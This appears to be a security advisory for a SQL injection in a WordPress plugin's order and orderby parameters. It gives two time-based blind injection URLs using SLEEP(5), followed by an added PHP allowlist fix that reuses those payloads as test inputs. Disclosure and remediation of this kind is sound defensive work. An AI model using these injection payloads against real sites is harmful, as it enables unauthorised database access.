The plugin does not sanitise and escape the order and orderby parameters before using them in a SQL statement, leading to a SQL injection.
https://example.com/wp-admin/admin.php?page=tp_editor&action=filter-by&order=+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
https://example.com/wp-admin/admin.php?page=tp_editor&action=filter-by&orderby=lang+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
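One way to handle order and orderby safely, shown as an added example and not the plugin's own code or its actual fix: sort columns and directions cannot be bound as query placeholders, so each value is matched against a fixed list and only the literal from that list reaches the SQL. The function name and all column names other than `lang` are hypothetical.

```php
<?php
// Added example: allowlist validation for ORDER BY input.
// Column names are hypothetical; only "lang" appears in the advisory.
const ALLOWED_ORDERBY = ['id', 'lang', 'original'];
const ALLOWED_ORDER   = ['ASC', 'DESC'];

/**
 * Build an ORDER BY clause from request parameters.
 * The request strings are only ever compared against the allowlists;
 * the text concatenated into the SQL comes from the constants above.
 * Anything that does not match falls back to the first allowed entry.
 */
function build_order_clause(array $request): string
{
    $orderby = $request['orderby'] ?? '';
    $order   = $request['order'] ?? '';

    // Non-string input (e.g. orderby[]=lang arrives as an array) is rejected.
    $col = is_string($orderby)
        ? array_search(strtolower(trim($orderby)), ALLOWED_ORDERBY, true)
        : false;
    $dir = is_string($order)
        ? array_search(strtoupper(trim($order)), ALLOWED_ORDER, true)
        : false;

    // array_search returns index 0 for the first entry, so compare with ===.
    $column    = $col === false ? ALLOWED_ORDERBY[0] : ALLOWED_ORDERBY[$col];
    $direction = $dir === false ? ALLOWED_ORDER[0] : ALLOWED_ORDER[$dir];

    return sprintf('ORDER BY `%s` %s', $column, $direction);
}

// Constructed inputs: a benign request, the two parameter values from the
// advisory's URLs (after URL decoding), and an array-typed parameter.
$samples = [
    ['orderby' => 'lang', 'order' => 'desc'],
    ['order'   => ' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)'],
    ['orderby' => 'lang AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)'],
    ['orderby' => ['lang']],
];

foreach ($samples as $sample) {
    echo build_order_clause($sample), PHP_EOL;
}
```

Only the first sample keeps its requested sort; the other three fall back to the default column and direction because nothing in them matches an allowlist entry exactly.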